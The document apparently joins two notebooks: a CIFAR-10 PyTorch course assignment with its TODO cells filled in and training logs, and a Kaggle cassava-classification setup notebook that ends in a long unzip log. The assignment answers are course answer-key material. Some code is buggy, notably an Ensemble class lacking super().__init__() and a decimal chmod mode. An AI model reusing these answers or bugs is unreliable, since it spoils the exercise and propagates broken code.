Part IV. PyTorch Sequential APIPart III introduced the PyTorch Module API, which allows you to define arbitrary learnable layers and their connectivity. For simple models like a stack of feed forward layers, you still need to go through 3 steps: subclass `nn.Module`, assign layers to class attributes in `__init__`, and call each layer one by one in `forward()`. Is there a more convenient way? Fortunately, PyTorch provides a container Module called `nn.Sequential`, which merges the above steps into one. It is not as flexible as `nn.Module`, because you cannot specify more complex topology than a feed-forward stack, but it's good enough for many use cases. Sequential API: Two-Layer NetworkLet's see how to rewrite our two-layer fully connected network example with `nn.Sequential`, and train it using the training loop defined above.Again, you don't need to tune any hyperparameters here, but you shoud achieve above 40% accuracy after one epoch of training.
###Code
# We need to wrap `flatten` function in a module in order to stack it
# in nn.Sequential
class Flatten(nn.Module):
def forward(self, x):
return flatten(x)
hidden_layer_size = 4000
learning_rate = 1e-2
model = nn.Sequential(
Flatten(),
nn.Linear(3 * 32 * 32, hidden_layer_size),
nn.ReLU(),
nn.Linear(hidden_layer_size, 10),
)
# you can use Nesterov momentum in optim.SGD
optimizer = optim.SGD(model.parameters(), lr=learning_rate,
momentum=0.9, nesterov=True)
train_part34(model, optimizer)
###Output
Iteration 0, loss = 2.2709
Checking accuracy on validation set
got 152 / 1000 correct (15.20)
Iteration 700, loss = 1.8989
Checking accuracy on validation set
got 435 / 1000 correct (43.50)
###Markdown
Sequential API: Three-Layer ConvNetHere you should use `nn.Sequential` to define and train a three-layer ConvNet with the same architecture we used in Part III:1. Convolutional layer (with bias) with 32 5x5 filters, with zero-padding of 22. ReLU3. Convolutional layer (with bias) with 16 3x3 filters, with zero-padding of 14. ReLU5. Fully-connected layer (with bias) to compute scores for 10 classesYou should initialize your weight matrices using the `random_weight` function defined above, and you should initialize your bias vectors using the `zero_weight` function above.You should optimize your model using stochastic gradient descent with Nesterov momentum 0.9.Again, you don't need to tune any hyperparameters but you should see accuracy above 55% after one epoch of training.
###Code
channel_1 = 32
channel_2 = 16
learning_rate = 1e-2
model = None
optimizer = None
################################################################################
# TODO: Rewrite the 2-layer ConvNet with bias from Part III with the #
# Sequential API. #
################################################################################
model = nn.Sequential(
nn.Conv2d(3, channel_1, (5,5), padding=2),
nn.ReLU(),
nn.Conv2d(channel_1, channel_2, (3,3), padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(channel_2*32*32, 10)
)
optimizer = optim.SGD(model.parameters(), lr=learning_rate,
momentum=0.9, nesterov=True)
################################################################################
# END OF YOUR CODE
################################################################################
train_part34(model, optimizer)
###Output
Iteration 0, loss = 2.3103
Checking accuracy on validation set
got 102 / 1000 correct (10.20)
Iteration 700, loss = 0.9798
Checking accuracy on validation set
got 592 / 1000 correct (59.20)
###Markdown
Part V. CIFAR-10 open-ended challengeIn this section, you can experiment with whatever ConvNet architecture you'd like on CIFAR-10. Now it's your job to experiment with architectures, hyperparameters, loss functions, and optimizers to train a model that achieves **at least 70%** accuracy on the CIFAR-10 **validation** set within 10 epochs. You can use the check_accuracy and train functions from above. You can use either `nn.Module` or `nn.Sequential` API. Describe what you did at the end of this notebook.Here are the official API documentation for each component. One note: what we call in the class "spatial batch norm" is called "BatchNorm2D" in PyTorch.* Layers in torch.nn package: http://pytorch.org/docs/stable/nn.html* Activations: http://pytorch.org/docs/stable/nn.htmlnon-linear-activations* Loss functions: http://pytorch.org/docs/stable/nn.htmlloss-functions* Optimizers: http://pytorch.org/docs/stable/optim.html Things you might try:- **Filter size**: Above we used 5x5; would smaller filters be more efficient?- **Number of filters**: Above we used 32 filters. Do more or fewer do better?- **Pooling vs Strided Convolution**: Do you use max pooling or just stride convolutions?- **Batch normalization**: Try adding spatial batch normalization after convolution layers and vanilla batch normalization after affine layers. Do your networks train faster?- **Network architecture**: The network above has two layers of trainable parameters. Can you do better with a deep network? Good architectures to try include: - [conv-relu-pool]xN -> [affine]xM -> [softmax or SVM] - [conv-relu-conv-relu-pool]xN -> [affine]xM -> [softmax or SVM] - [batchnorm-relu-conv]xN -> [affine]xM -> [softmax or SVM]- **Global Average Pooling**: Instead of flattening and then having multiple affine layers, perform convolutions until your image gets small (7x7 or so) and then perform an average pooling operation to get to a 1x1 image picture (1, 1 , Filter), which is then reshaped into a (Filter) vector. This is used in [Google's Inception Network](https://arxiv.org/abs/1512.00567) (See Table 1 for their architecture).- **Regularization**: Add l2 weight regularization, or perhaps use Dropout. Tips for trainingFor each network architecture that you try, you should tune the learning rate and other hyperparameters. When doing this there are a couple important things to keep in mind:- If the parameters are working well, you should see improvement within a few hundred iterations- Remember the coarse-to-fine approach for hyperparameter tuning: start by testing a large range of hyperparameters for just a few training iterations to find the combinations of parameters that are working at all.- Once you have found some sets of parameters that seem to work, search more finely around these parameters. You may need to train for more epochs.- You should use the validation set for hyperparameter search, and save your test set for evaluating your architecture on the best parameters as selected by the validation set. Going above and beyondIf you are feeling adventurous there are many other features you can implement to try and improve your performance. You are **not required** to implement any of these, but don't miss the fun if you have time!- Alternative optimizers: you can try Adam, Adagrad, RMSprop, etc.- Alternative activation functions such as leaky ReLU, parametric ReLU, ELU, or MaxOut.- Model ensembles- Data augmentation- New Architectures - [ResNets](https://arxiv.org/abs/1512.03385) where the input from the previous layer is added to the output. - [DenseNets](https://arxiv.org/abs/1608.06993) where inputs into previous layers are concatenated together. - [This blog has an in-depth overview](https://chatbotslife.com/resnets-highwaynets-and-densenets-oh-my-9bb15918ee32) Have fun and happy training!
###Code
def check_accuracy(loader, model):
num_correct = 0
num_samples = 0
model.eval() # set model to evaluation mode
with torch.no_grad():
for x, y in loader:
x = x.to(device=device, dtype=dtype) # move to device, e.g. GPU
y = y.to(device=device, dtype=torch.long)
scores = model(x)
_, preds = scores.max(1)
num_correct += (preds == y).sum()
num_samples += preds.size(0)
return float(num_correct) / num_samples
def train(model, optimizer, print_every=700, epochs=3, verbose=False):
model = model.to(device=device) # move the model parameters to CPU/GPU
best_val_acc = 0.7
model_hist = {}
for e in range(epochs):
if verbose or print_every==-1:
print(f'Epoch number {e+1}')
for t, (x, y) in enumerate(loader_train):
model.train() # put model to training mode
x = x.to(device=device, dtype=dtype) # move to device, e.g. GPU
y = y.to(device=device, dtype=torch.long)
scores = model(x)
loss = F.cross_entropy(scores, y)
# Zero out all of the gradients for the variables which the optimizer
# will update.
optimizer.zero_grad()
# This is the backwards pass: compute the gradient of the loss with
# respect to each parameter of the model.
loss.backward()
# Actually update the parameters of the model using the gradients
# computed by the backwards pass.
optimizer.step()
if (print_every == -1 and t==len(loader_train)-1) or (verbose and t % print_every == 0):
with torch.no_grad():
_, preds = scores.max(1)
tr_acc = float(torch.sum(preds==y)) / len(y)
val_acc = check_accuracy(loader_val, model)
print('Iteration %d, loss = %.4f' % (t, loss.item()))
print(f' training accuracy = {tr_acc:.4f}\nvalidation accuracy = {val_acc:.4f}')
print()
cur_val_acc = check_accuracy(loader_val, model)
if best_val_acc <= cur_val_acc:
best_val_acc = cur_val_acc
model_hist[cur_val_acc] = model
return model_hist
################################################################################
# TODO: #
# Experiment with any architectures, optimizers, and hyperparameters. #
# Achieve AT LEAST 70% accuracy on the *validation set* within 10 epochs. #
# #
# Note that you can use the check_accuracy function to evaluate on either #
# the test set or the validation set, by passing either loader_test or #
# loader_val as the second argument to check_accuracy. You should not touch #
# the test set until you have finished your architecture and hyperparameter #
# tuning, and only run the test set once at the end to report a final value. #
################################################################################
#lr = 1e-3
def init_weights(m):
if type(m)==nn.Linear:
nn.init.kaiming_normal_(m.weight)
print_every = 700
best_model, best_acc = None, -1
arange = [10**(-i) for i in range(10)]
# 7.5e-4
# 1.8e-3
for _ in range(10):
lr, reg = np.random.uniform(1e-3 * 0.9, 1e-3 * 1.5), np.random.uniform(1e-4, 10e-4)
#lr, reg = 1.5e-4, 1e-4
model = nn.Sequential(
nn.BatchNorm2d(3),
nn.ReLU(),
nn.Conv2d(3, 64, (11,11), padding=5, stride=2), # output size 64 x 16 x 16
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Conv2d(64, 48, (7,7), padding=3), # output size 48 x 16 x 16
nn.MaxPool2d(2), # output size 48 x 8 x 8
nn.BatchNorm2d(48),
nn.ReLU(),
nn.Conv2d(48, 32, (5,5), padding=2), # output size 32 x 8 x 8
nn.BatchNorm2d(32),
nn.ReLU(),
nn.Conv2d(32, 16, (3,3), padding=1), # output size 16 x 8 x 8
nn.MaxPool2d(2), # output size 16 x 4 x 4
Flatten(),
nn.Linear(16*4*4, 16*2*2),
nn.ReLU(),
nn.Linear(16*2*2, 10)
)
model.apply(init_weights)
optimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=reg)
train(model, optimizer, epochs=10, verbose=True)
print(f'\nlearning rate {lr:e} weight decay {reg:e} ')
acc = check_accuracy(loader_val, model)
print(f'validation accuracy {acc:.4f}\n')
if best_acc < acc:
best_acc = acc
best_model = model
print('\ndone!')
################################################################################
# END OF YOUR CODE
################################################################################
# You should get at least 70% accuracy
#train_part34(model, optimizer, epochs=10)
###Output
Epoch number 1
Iteration 0, loss = 2.3001
training accuracy = 0.0781
validation accuracy = 0.1070
Iteration 700, loss = 1.5165
training accuracy = 0.5312
validation accuracy = 0.5410
Epoch number 2
Iteration 0, loss = 1.1771
training accuracy = 0.5156
validation accuracy = 0.5170
Iteration 700, loss = 1.2007
training accuracy = 0.5625
validation accuracy = 0.6020
Epoch number 3
Iteration 0, loss = 0.9873
training accuracy = 0.6562
validation accuracy = 0.6240
Iteration 700, loss = 1.0352
training accuracy = 0.5938
validation accuracy = 0.5990
Epoch number 4
Iteration 0, loss = 0.9708
training accuracy = 0.6562
validation accuracy = 0.6000
Iteration 700, loss = 0.6899
training accuracy = 0.7344
validation accuracy = 0.6850
Epoch number 5
Iteration 0, loss = 0.8157
training accuracy = 0.7188
validation accuracy = 0.6600
Iteration 700, loss = 0.9030
training accuracy = 0.6719
validation accuracy = 0.6800
Epoch number 6
Iteration 0, loss = 0.6646
training accuracy = 0.7969
validation accuracy = 0.7000
Iteration 700, loss = 0.7174
training accuracy = 0.7656
validation accuracy = 0.7060
Epoch number 7
Iteration 0, loss = 0.8550
training accuracy = 0.7500
validation accuracy = 0.6620
Iteration 700, loss = 0.8328
training accuracy = 0.6094
validation accuracy = 0.6990
Epoch number 8
Iteration 0, loss = 0.4741
training accuracy = 0.8281
validation accuracy = 0.6870
Iteration 700, loss = 1.0313
training accuracy = 0.6094
validation accuracy = 0.7110
Epoch number 9
Iteration 0, loss = 0.5490
training accuracy = 0.7969
validation accuracy = 0.7030
Iteration 700, loss = 0.6466
training accuracy = 0.7812
validation accuracy = 0.7280
Epoch number 10
Iteration 0, loss = 0.7034
training accuracy = 0.7969
validation accuracy = 0.6750
Iteration 700, loss = 0.5950
training accuracy = 0.7812
validation accuracy = 0.7030
learning rate 1.029322e-03 weight decay 6.013453e-04
validation accuracy 0.7030
Epoch number 1
Iteration 0, loss = 2.3413
training accuracy = 0.1250
validation accuracy = 0.0960
Iteration 700, loss = 1.3834
training accuracy = 0.5000
validation accuracy = 0.5200
Epoch number 2
Iteration 0, loss = 1.4109
training accuracy = 0.5156
validation accuracy = 0.5420
Iteration 700, loss = 1.0116
training accuracy = 0.6094
validation accuracy = 0.6200
Epoch number 3
Iteration 0, loss = 0.9819
training accuracy = 0.7031
validation accuracy = 0.5790
Iteration 700, loss = 0.7005
training accuracy = 0.7500
validation accuracy = 0.6280
Epoch number 4
Iteration 0, loss = 0.8674
training accuracy = 0.7188
validation accuracy = 0.5830
Iteration 700, loss = 0.8991
training accuracy = 0.6719
validation accuracy = 0.6300
Epoch number 5
Iteration 0, loss = 0.7653
training accuracy = 0.7188
validation accuracy = 0.6710
Iteration 700, loss = 0.8980
training accuracy = 0.6562
validation accuracy = 0.6680
Epoch number 6
Iteration 0, loss = 0.5811
training accuracy = 0.8125
validation accuracy = 0.6710
Iteration 700, loss = 0.6955
training accuracy = 0.7812
validation accuracy = 0.7070
Epoch number 7
Iteration 0, loss = 0.7687
training accuracy = 0.7344
validation accuracy = 0.6270
Iteration 700, loss = 0.8199
training accuracy = 0.7031
validation accuracy = 0.6850
Epoch number 8
Iteration 0, loss = 0.7214
training accuracy = 0.7500
validation accuracy = 0.6820
Iteration 700, loss = 0.8504
training accuracy = 0.6250
validation accuracy = 0.6860
Epoch number 9
Iteration 0, loss = 0.5765
training accuracy = 0.8281
validation accuracy = 0.6930
Iteration 700, loss = 0.5571
training accuracy = 0.8281
validation accuracy = 0.6890
Epoch number 10
Iteration 0, loss = 0.4134
training accuracy = 0.8438
validation accuracy = 0.6930
Iteration 700, loss = 0.8280
training accuracy = 0.7812
validation accuracy = 0.6810
learning rate 1.173845e-03 weight decay 3.534350e-04
validation accuracy 0.7080
Epoch number 1
Iteration 0, loss = 2.3126
training accuracy = 0.0938
validation accuracy = 0.1050
Iteration 700, loss = 1.0690
training accuracy = 0.6250
validation accuracy = 0.4880
Epoch number 2
Iteration 0, loss = 1.2379
training accuracy = 0.5312
validation accuracy = 0.5560
Iteration 700, loss = 1.0571
training accuracy = 0.6250
validation accuracy = 0.5960
Epoch number 3
Iteration 0, loss = 0.9475
training accuracy = 0.7188
validation accuracy = 0.5820
Iteration 700, loss = 1.1188
training accuracy = 0.6406
validation accuracy = 0.6150
Epoch number 4
Iteration 0, loss = 0.8721
training accuracy = 0.7812
validation accuracy = 0.6670
Iteration 700, loss = 0.9538
training accuracy = 0.7031
validation accuracy = 0.6500
Epoch number 5
Iteration 0, loss = 0.7811
training accuracy = 0.6719
validation accuracy = 0.6510
Iteration 700, loss = 0.7254
training accuracy = 0.7344
validation accuracy = 0.6590
Epoch number 6
Iteration 0, loss = 0.7479
training accuracy = 0.7500
validation accuracy = 0.6780
Iteration 700, loss = 0.7734
training accuracy = 0.7344
validation accuracy = 0.6880
Epoch number 7
Iteration 0, loss = 0.8073
training accuracy = 0.7500
validation accuracy = 0.6720
Iteration 700, loss = 0.6575
training accuracy = 0.7969
validation accuracy = 0.6630
Epoch number 8
Iteration 0, loss = 0.6770
training accuracy = 0.7969
validation accuracy = 0.6600
Iteration 700, loss = 0.6271
training accuracy = 0.7344
validation accuracy = 0.7040
Epoch number 9
Iteration 0, loss = 0.6725
training accuracy = 0.7969
validation accuracy = 0.6910
Iteration 700, loss = 0.8680
training accuracy = 0.6719
validation accuracy = 0.6970
Epoch number 10
Iteration 0, loss = 0.5718
training accuracy = 0.7812
validation accuracy = 0.7060
Iteration 700, loss = 0.5898
training accuracy = 0.8125
validation accuracy = 0.6380
learning rate 1.339509e-03 weight decay 8.640335e-04
validation accuracy 0.7110
Epoch number 1
Iteration 0, loss = 2.2951
training accuracy = 0.2031
validation accuracy = 0.1130
Iteration 700, loss = 1.4657
training accuracy = 0.4844
validation accuracy = 0.5210
Epoch number 2
Iteration 0, loss = 1.1688
training accuracy = 0.6250
validation accuracy = 0.5210
Iteration 700, loss = 1.1031
training accuracy = 0.6094
validation accuracy = 0.5950
Epoch number 3
Iteration 0, loss = 0.9336
training accuracy = 0.6250
validation accuracy = 0.5870
Iteration 700, loss = 0.9488
training accuracy = 0.6562
validation accuracy = 0.6400
Epoch number 4
Iteration 0, loss = 0.8541
training accuracy = 0.6875
validation accuracy = 0.6600
Iteration 700, loss = 0.8948
training accuracy = 0.6250
validation accuracy = 0.6530
Epoch number 5
Iteration 0, loss = 0.7268
training accuracy = 0.7812
validation accuracy = 0.6790
Iteration 700, loss = 0.9360
training accuracy = 0.6406
validation accuracy = 0.6640
Epoch number 6
Iteration 0, loss = 0.7047
training accuracy = 0.7812
validation accuracy = 0.6990
Iteration 700, loss = 0.8533
training accuracy = 0.7031
validation accuracy = 0.6740
Epoch number 7
Iteration 0, loss = 0.6924
training accuracy = 0.7500
validation accuracy = 0.6660
Iteration 700, loss = 0.7955
training accuracy = 0.7031
validation accuracy = 0.6600
Epoch number 8
Iteration 0, loss = 0.9113
training accuracy = 0.7812
validation accuracy = 0.6750
Iteration 700, loss = 0.6279
training accuracy = 0.7969
validation accuracy = 0.7100
Epoch number 9
Iteration 0, loss = 0.6390
training accuracy = 0.7812
validation accuracy = 0.7070
Iteration 700, loss = 0.7873
training accuracy = 0.7344
validation accuracy = 0.6880
Epoch number 10
Iteration 0, loss = 0.4615
training accuracy = 0.7969
validation accuracy = 0.6720
Iteration 700, loss = 0.5586
training accuracy = 0.8281
validation accuracy = 0.6980
learning rate 1.282588e-03 weight decay 4.741023e-04
validation accuracy 0.7030
Epoch number 1
Iteration 0, loss = 2.6395
training accuracy = 0.1250
validation accuracy = 0.1070
Iteration 700, loss = 1.5005
training accuracy = 0.5469
validation accuracy = 0.5150
Epoch number 2
Iteration 0, loss = 1.3631
training accuracy = 0.5156
validation accuracy = 0.5420
Iteration 700, loss = 0.9643
training accuracy = 0.6562
validation accuracy = 0.6210
###Markdown
Describe what you did In the cell below you should write an explanation of what you did, any additional features that you implemented, and/or any graphs that you made in the process of training and evaluating your network. TODO: Describe what you did
###Code
model = nn.Sequential(
nn.BatchNorm2d(3),
nn.ReLU(),
nn.Conv2d(3, 16, (11,11), padding=5), # output size 16 * 32 * 32
nn.MaxPool2d(2), # output size 16 * 16 * 16
nn.BatchNorm2d(16),
nn.ReLU(),
nn.Conv2d(16, 32, (7,7), padding=3), # output size 32 x 16 x 16
nn.MaxPool2d(2), # output size 32 x 8 x 8
nn.BatchNorm2d(32),
nn.ReLU(),
nn.Conv2d(32, 64, (5,5), padding=2), # output size 64 * 8 * 8
nn.MaxPool2d(2), # output size 64 * 4 * 4
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Conv2d(64, 128, (3,3), padding=1), # output size 128 * 4 * 4
nn.MaxPool2d(2), # output size 128 * 2 * 2
Flatten(),
nn.Linear(128*2*2, 64),
nn.ReLU(),
nn.Dropout(p=0.4),
nn.Linear(64, 128),
nn.ReLU(),
nn.Dropout(p=0.4),
nn.Linear(128, 256),
nn.ReLU(),
nn.Dropout(p=0.4),
nn.Linear(256, 10)
)
model.apply(init_weights)
optimizer = optim.Adam(model.parameters(), lr=1e-03, weight_decay=2e-03)
model_hist = train(model, optimizer, print_every=-1, epochs=60, verbose=False)
check_accuracy(loader_val, model)
class Ensemble(nn.Module):
def __init__(self, models):
self.models = models
def forward(self, x):
scores = torch.mean(torch.stack([a.forward(x) for a in self.models.values()]), dim=0)
return scores
print(f'Ensemble of {len(model_hist)} models with the following validation accuracies:')
print(*model_hist.keys(), sep='\n')
model = Ensemble(model_hist)
#check_accuracy(loader_val, model)
num_correct = 0
num_samples = 0
with torch.no_grad():
for x, y in loader_val:
x = x.to(device=device, dtype=dtype) # move to device, e.g. GPU
y = y.to(device=device, dtype=torch.long)
scores = model.forward(x)
_, preds = scores.max(1)
num_correct += (preds == y).sum()
num_samples += preds.size(0)
print(float(num_correct) / num_samples)
###Output
0.688
###Markdown
Test set -- run this only onceNow that we've gotten a result we're happy with, we test our final model on the test set (which you should store in best_model). Think about how this compares to your validation set accuracy.
###Code
check_accuracy(loader_test, model)
###Output
_____no_output_____ |
notebook/06t-efficientnet_b4_ns-512.ipynb.ipynb | ###Markdown
GPU
###Code
gpu_info = !nvidia-smi
gpu_info = '\n'.join(gpu_info)
print(gpu_info)
###Output
Wed Jan 13 05:09:48 2021
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 460.27.04 Driver Version: 418.67 CUDA Version: 10.1 |
|-------------------------------+----------------------+----------------------+
| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
| | | MIG M. |
|===============================+======================+======================|
| 0 Tesla T4 Off | 00000000:00:04.0 Off | 0 |
| N/A 61C P8 12W / 70W | 0MiB / 15079MiB | 0% Default |
| | | ERR! |
+-------------------------------+----------------------+----------------------+
+-----------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|=============================================================================|
| No running processes found |
+-----------------------------------------------------------------------------+
###Markdown
CFG
###Code
CONFIG_NAME = 'config06.yml'
TITLE = '06t-efficientnet_b4_ns-512'
! git clone https://github.com/raijin0704/cassava.git
# ====================================================
# CFG
# ====================================================
import yaml
CONFIG_PATH = f'./cassava/config/{CONFIG_NAME}'
with open(CONFIG_PATH) as f:
config = yaml.load(f)
INFO = config['info']
TAG = config['tag']
CFG = config['cfg']
CFG['train'] = True
CFG['inference'] = False
# CFG['debug'] = True
if CFG['debug']:
CFG['epochs'] = 1
assert INFO['TITLE'] == TITLE
###Output
Cloning into 'cassava'...
remote: Enumerating objects: 75, done.[K
remote: Counting objects: 100% (75/75), done.[K
remote: Compressing objects: 100% (68/68), done.[K
remote: Total 75 (delta 48), reused 10 (delta 5), pack-reused 0[K
Unpacking objects: 100% (75/75), done.
###Markdown
colab & kaggle notebookでの環境面の処理 colab
###Code
def _colab_kaggle_authority():
from googleapiclient.discovery import build
import io, os
from googleapiclient.http import MediaIoBaseDownload
drive_service = build('drive', 'v3')
results = drive_service.files().list(
q="name = 'kaggle.json'", fields="files(id)").execute()
kaggle_api_key = results.get('files', [])
filename = "/root/.kaggle/kaggle.json"
os.makedirs(os.path.dirname(filename), exist_ok=True)
request = drive_service.files().get_media(fileId=kaggle_api_key[0]['id'])
fh = io.FileIO(filename, 'wb')
downloader = MediaIoBaseDownload(fh, request)
done = False
while done is False:
status, done = downloader.next_chunk()
print("Download %d%%." % int(status.progress() * 100))
os.chmod(filename, 600)
def process_colab():
import subprocess
# ドライブのマウント
from google.colab import drive
drive.mount('/content/drive')
# Google Cloudの権限設定
from google.colab import auth
auth.authenticate_user()
# kaggle設定
# _colab_kaggle_authority()
# subprocess.run('pip install --upgrade --force-reinstall --no-deps kaggle'.split(' '))
# ライブラリ関係
subprocess.run('pip install --upgrade opencv-python'.split(' '))
subprocess.run('pip install --upgrade albumentations'.split(' '))
subprocess.run('pip install timm'.split(' '))
# 各種pathの設定
# DATA_PATH = '/content/drive/Shareddrives/便利用/kaggle/cassava/input/'
# ! cp -r /content/drive/Shareddrives/便利用/kaggle/cassava/input /content/input
DATA_PATH = '/content/input/'
OUTPUT_DIR = './output/'
NOTEBOOK_PATH = f'/content/drive/Shareddrives/便利用/kaggle/cassava/notebook/{TITLE}.ipynb'
return DATA_PATH, OUTPUT_DIR, NOTEBOOK_PATH
###Output
_____no_output_____
###Markdown
kaggle notebook
###Code
def _kaggle_gcp_authority():
from kaggle_secrets import UserSecretsClient
user_secrets = UserSecretsClient()
user_credential = user_secrets.get_gcloud_credential()
user_secrets.set_tensorflow_credential(user_credential)
def process_kaggle():
# GCP設定
_kaggle_gcp_authority()
# 各種pathの設定
DATA_PATH = '../input/cassava-leaf-disease-classification/'
OUTPUT_DIR = './'
# NOTEBOOK_PATH = './__notebook__.ipynb'
NOTEBOOK_PATH = f'/content/drive/Shareddrives/便利用/kaggle/cassava/notebook/{TITLE}.ipynb'
# system path
import sys
sys.path.append('../input/pytorch-image-models/pytorch-image-models-master')
return DATA_PATH, OUTPUT_DIR, NOTEBOOK_PATH
###Output
_____no_output_____
###Markdown
共通
###Code
def process_common():
# ライブラリ関係
import subprocess
subprocess.run('pip install mlflow'.split(' '))
# 環境変数
import os
os.environ["GCLOUD_PROJECT"] = INFO['PROJECT_ID']
try:
from google.colab import auth
except ImportError:
DATA_PATH, OUTPUT_DIR, NOTEBOOK_PATH = process_kaggle()
else:
DATA_PATH, OUTPUT_DIR, NOTEBOOK_PATH = process_colab()
finally:
process_common()
!rm -r /content/input
import os
try:
from google.colab import auth
except ImportError:
pass
else:
! cp /content/drive/Shareddrives/便利用/kaggle/cassava/input.zip /content/input.zip
! unzip input.zip
! rm input.zip
train_num = len(os.listdir(DATA_PATH+"/train_images"))
assert train_num == 21397
###Output
[1;30;43mストリーミング出力は最後の 5000 行に切り捨てられました。[0m
inflating: input/train_images/1137739472.jpg
inflating: input/train_images/441313044.jpg
inflating: input/train_images/982733151.jpg
inflating: input/train_images/3643480526.jpg
inflating: input/train_images/2440664696.jpg
inflating: input/train_images/370523815.jpg
inflating: input/train_images/1125560878.jpg
inflating: input/train_images/3303165486.jpg
inflating: input/train_images/510873412.jpg
inflating: input/train_images/550429661.jpg
inflating: input/train_images/1127352598.jpg
inflating: input/train_images/3767196717.jpg
inflating: input/train_images/25671501.jpg
inflating: input/train_images/2296550892.jpg
inflating: input/train_images/754482252.jpg
inflating: input/train_images/3714169299.jpg
inflating: input/train_images/127776052.jpg
inflating: input/train_images/3761357668.jpg
inflating: input/train_images/996534381.jpg
inflating: input/train_images/255701322.jpg
inflating: input/train_images/1448397186.jpg
inflating: input/train_images/2531944838.jpg
inflating: input/train_images/3700174408.jpg
inflating: input/train_images/1026177105.jpg
inflating: input/train_images/600110842.jpg
inflating: input/train_images/3937975751.jpg
inflating: input/train_images/3461803618.jpg
inflating: input/train_images/1426179564.jpg
inflating: input/train_images/1010855776.jpg
inflating: input/train_images/1475296121.jpg
inflating: input/train_images/3298093070.jpg
inflating: input/train_images/1620970351.jpg
inflating: input/train_images/1488733138.jpg
inflating: input/train_images/1333419699.jpg
inflating: input/train_images/360076327.jpg
inflating: input/train_images/3009647475.jpg
inflating: input/train_images/2234089477.jpg
inflating: input/train_images/2609118194.jpg
inflating: input/train_images/410890316.jpg
inflating: input/train_images/4184062100.jpg
inflating: input/train_images/2963247427.jpg
inflating: input/train_images/3178512733.jpg
inflating: input/train_images/1353797925.jpg
inflating: input/train_images/2177911442.jpg
inflating: input/train_images/4065072100.jpg
inflating: input/train_images/1058428683.jpg
inflating: input/train_images/3400218369.jpg
inflating: input/train_images/1815863009.jpg
inflating: input/train_images/1233926167.jpg
inflating: input/train_images/1916594362.jpg
inflating: input/train_images/3095137637.jpg
inflating: input/train_images/3028047509.jpg
inflating: input/train_images/2857325941.jpg
inflating: input/train_images/3224710052.jpg
inflating: input/train_images/3214705014.jpg
inflating: input/train_images/2625055972.jpg
inflating: input/train_images/2041267183.jpg
inflating: input/train_images/2763501516.jpg
inflating: input/train_images/3808267926.jpg
inflating: input/train_images/1978570472.jpg
inflating: input/train_images/2866106633.jpg
inflating: input/train_images/1924914.jpg
inflating: input/train_images/607627857.jpg
inflating: input/train_images/3815389777.jpg
inflating: input/train_images/29157816.jpg
inflating: input/train_images/1472883908.jpg
inflating: input/train_images/716814677.jpg
inflating: input/train_images/1803483476.jpg
inflating: input/train_images/514040790.jpg
inflating: input/train_images/1559511598.jpg
inflating: input/train_images/3791164400.jpg
inflating: input/train_images/3612093736.jpg
inflating: input/train_images/1899940648.jpg
inflating: input/train_images/4017689394.jpg
inflating: input/train_images/2628143794.jpg
inflating: input/train_images/1960927003.jpg
inflating: input/train_images/987080644.jpg
inflating: input/train_images/1290734565.jpg
inflating: input/train_images/3914399588.jpg
inflating: input/train_images/2896221561.jpg
inflating: input/train_images/3319706331.jpg
inflating: input/train_images/960648391.jpg
inflating: input/train_images/2776899438.jpg
inflating: input/train_images/1367181542.jpg
inflating: input/train_images/634618230.jpg
inflating: input/train_images/1093539112.jpg
inflating: input/train_images/1757605463.jpg
inflating: input/train_images/3727402157.jpg
inflating: input/train_images/1331106068.jpg
inflating: input/train_images/2569150875.jpg
inflating: input/train_images/63578884.jpg
inflating: input/train_images/2351347259.jpg
inflating: input/train_images/2515648929.jpg
inflating: input/train_images/489859226.jpg
inflating: input/train_images/1096302814.jpg
inflating: input/train_images/1894282232.jpg
inflating: input/train_images/3009725992.jpg
inflating: input/train_images/4091446019.jpg
inflating: input/train_images/4218379987.jpg
inflating: input/train_images/721201325.jpg
inflating: input/train_images/3164729248.jpg
inflating: input/train_images/2190893097.jpg
inflating: input/train_images/3451525469.jpg
inflating: input/train_images/3014758416.jpg
inflating: input/train_images/3540255449.jpg
inflating: input/train_images/3048875200.jpg
inflating: input/train_images/3158777284.jpg
inflating: input/train_images/525960141.jpg
inflating: input/train_images/2171124892.jpg
inflating: input/train_images/3013885002.jpg
inflating: input/train_images/3136739059.jpg
inflating: input/train_images/113115280.jpg
inflating: input/train_images/3473193669.jpg
inflating: input/train_images/149926175.jpg
inflating: input/train_images/69869891.jpg
inflating: input/train_images/2618549388.jpg
inflating: input/train_images/3645775098.jpg
inflating: input/train_images/2534943188.jpg
inflating: input/train_images/1881585879.jpg
inflating: input/train_images/378056459.jpg
inflating: input/train_images/1943423929.jpg
inflating: input/train_images/2495248330.jpg
inflating: input/train_images/2348415590.jpg
inflating: input/train_images/1908552116.jpg
inflating: input/train_images/1834449995.jpg
inflating: input/train_images/3363323405.jpg
inflating: input/train_images/1100049957.jpg
inflating: input/train_images/4102423093.jpg
inflating: input/train_images/3699866059.jpg
inflating: input/train_images/4040452479.jpg
inflating: input/train_images/27989539.jpg
inflating: input/train_images/1998118528.jpg
inflating: input/train_images/2446149894.jpg
inflating: input/train_images/3446250532.jpg
inflating: input/train_images/484161659.jpg
inflating: input/train_images/913261951.jpg
inflating: input/train_images/469774939.jpg
inflating: input/train_images/979088794.jpg
inflating: input/train_images/640668148.jpg
inflating: input/train_images/2095404633.jpg
inflating: input/train_images/744371772.jpg
inflating: input/train_images/707347112.jpg
inflating: input/train_images/405406521.jpg
inflating: input/train_images/1696348486.jpg
inflating: input/train_images/1364063429.jpg
inflating: input/train_images/2468021699.jpg
inflating: input/train_images/3968384941.jpg
inflating: input/train_images/621642656.jpg
inflating: input/train_images/1935476091.jpg
inflating: input/train_images/1850804110.jpg
inflating: input/train_images/3106298633.jpg
inflating: input/train_images/1224284456.jpg
inflating: input/train_images/592236552.jpg
inflating: input/train_images/4145595052.jpg
inflating: input/train_images/3719586023.jpg
inflating: input/train_images/4089978663.jpg
inflating: input/train_images/1832863930.jpg
inflating: input/train_images/708059328.jpg
inflating: input/train_images/2265275376.jpg
inflating: input/train_images/2817027058.jpg
inflating: input/train_images/36663927.jpg
